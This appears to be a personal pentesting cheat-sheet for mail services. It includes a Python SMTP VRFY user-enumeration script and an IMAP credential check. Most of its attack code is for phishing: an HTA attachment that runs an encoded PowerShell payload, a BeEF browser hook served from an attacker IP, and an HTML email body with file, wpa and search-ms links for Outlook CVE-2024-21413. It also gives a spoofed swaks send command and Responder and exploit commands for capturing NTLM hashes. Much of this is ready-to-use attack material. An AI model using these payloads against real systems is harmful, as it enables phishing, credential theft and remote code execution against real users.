####
MAIL
####

| 

****
SMTP
****

| https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp
|
| (WIP) Enum users with VRFY

.. code-block:: bash

  #!/usr/bin/python3
  # python3 /tmp/test.py servermail /tmp/users
  import asyncio
  import sys

  METHOD = 'VRFY'

  NC = '\033[0m'
  FAIL = '\033[1m\033[91m'
  WARN = '\033[1m\033[93m'
  GREEN = '\033[1m\033[92m'

  async def Send_MSG(user,writer):
      msg = METHOD + ' ' + user + '\r\n'
      writer.write(msg.encode())
      await writer.drain()

  async def Receive_MSG(reader):
      data = await reader.read(1024)
      code = data.decode().split()[0]
      return data, code

  async def Check_Users_On_Server(server, users):
      reader, writer = await asyncio.open_connection(server, 25)

      data, code = await Receive_MSG(reader)
      if code == '220':
          print(f'{NC} ... {code} {server} : {data.decode()!r}')

      await Send_MSG("qrbthuatys", writer)
      data, code = await Receive_MSG(reader)
      if code  == '252':
          print(f"{WARN} !!! {code} {server}: WILDCARD DETECTED, aborting... {NC}({data.decode()!r})")
          return

      for user in users:
          await Send_MSG(user, writer)
          data, code = await Receive_MSG(reader)
          if code in ['502','503'] :
              print(f"{NC} ... {code} {server} : unavailable method {METHOD}, aborting... ({data.decode()!r})")
              break
          elif code == '550':
              print(f"{WARN} !!! {code} {server}: User '{user}' not found {NC}({data.decode()!r})")
          elif code == '252':
              print(f"{GREEN} +++ {code} {server}: User '{user}' PROBABLY valid {NC}({data.decode()!r})")
          elif code == '250':
              print(f"{GREEN} +++ {code} {server}: User '{user}' VALID !! {NC}({data.decode()!r})")
          else :
              print(f'{FAIL} ??? {code} {server} : {data.decode()!r}')

      writer.close()
      await writer.wait_closed()

  with open(sys.argv[2], 'r') as f :
      USERS = f.read().splitlines()

  async def main():
      tasks = []
      tasks.append(Check_Users_On_Server(sys.argv[1],USERS))
      await asyncio.gather(*tasks)

  asyncio.run(main())

|

****
IMAP
****

| https://book.hacktricks.xyz/network-services-pentesting/pentesting-imap

| Checking if creds are valids :

.. code-block:: bash

  user@host:/$ telnet server.beepboop 143
  Trying 10.129.236.142...
  Connected to server.beepboop.
  Escape character is '^]'.
  * OK IMAPrev1
  A1 LOGIN administrator@server.beepboop password123
  A1 OK LOGIN completed

|

****
POP3
****

| https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop

.. code-block:: bash

  xxx

|

********
Phishing
********

| When performing phishing we can expect from user to interact with our payloads.
| I'm creating a HTA payload that we can send as an attachment.

.. code-block:: bash

  cat <<'EOF'>/tmp/rs.hta
  <html>
  <head><title>This is a HTA!</title></head>
  <body>
  <p>Hello World</p>
  </body>

  <script language="VBScript">
  Function RunFunc()
  Set shell = CreateObject("wscript.Shell")
  shell.run "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -E REPLACEMEWITHBASE64"
  End Function

  RunFunc
  </script>
  </html>
  EOF

| If the user click on links you can also try to link the user's browser with beef,
| You have to run beef and host a web page to run the script

.. code-block:: bash

  cat <<'EOF'|sudo tee /var/www/html/beef.html
  <!DOCTYPE html>
  <script src="http://10.10.14.121:3000/hook.js"></script>
  </html>
  EOF

|

| here is a html body example, including beef link, wpa link, search-ms link and a file link (see Outlook CVE-2024-21413)

.. code-block:: bash

  cat <<'EOF'>/tmp/body.html
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  <html xmlns:v="urn:schemas-microsoft-com:vml">
  <head>
      <meta http-equiv="content-type" content="text/html; charset=utf-8">
      <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;">
  </head>
  <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
  <table bgcolor="#343846" width="100%" border="0" cellpadding="0" cellspacing="0">
      <tbody>
      <tr>
      <td>
        <img src="http://10.10.14.121/IMG.png"><br>
        Hello, click here : <br>
        <a href="file:///\\10.10.14.121\CVE\2024\21413!hack"> file:///\\10.10.14.121\CVE\2024\21413!hack </a> <br>
        <a href="http://10.10.14.121/beef.html"> http://10.10.14.121/beef.html </a> <br>
        <a href="wpa:////10.10.14.121/WPA"> wpa:////10.10.14.121/WPA </a> <br>
        <a href="search-ms://query=poc&subquery=\\10.10.14.121\poc.search-ms"> search-ms://query=poc&subquery=\\10.10.14.121\poc.search-ms </a> <br>
      </td>
      </tr>
      </tbody>
  </table>
  </html>
  EOF

|

.. code-block:: bash

  swaks \
  --auth-user user@domain.com \
  --auth-password password \
  --to targetuser@domain.com \
  --from itsupport@domain.com \
  --header "Subject: ClickMe" \
  --server servermail.domain.com \
  --attach-type text/plain --attach-body ' ' \
  --attach-type text/html --attach-body @/tmp/body.html \
  --attach @/tmp/rs.hta

|

****************
Phishing Outlook
****************

| Poc for Outlook CVE-2024-21413 (NTLM auth to Responder)
|   https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
|   https://github.com/lgandx/Responder

.. code-block:: bash

  sudo python3 /opt/Responder/Responder.py -I tun0 -w -v

.. code-block:: bash

  python3 CVE-2024-21413.py --server servermail.domain.com --port 587 --username user@domain.com --password PASS --sender user@domain.com --recipient target@domain.com --url '\\1.2.3.4\bla\bla' --subject BeepBoop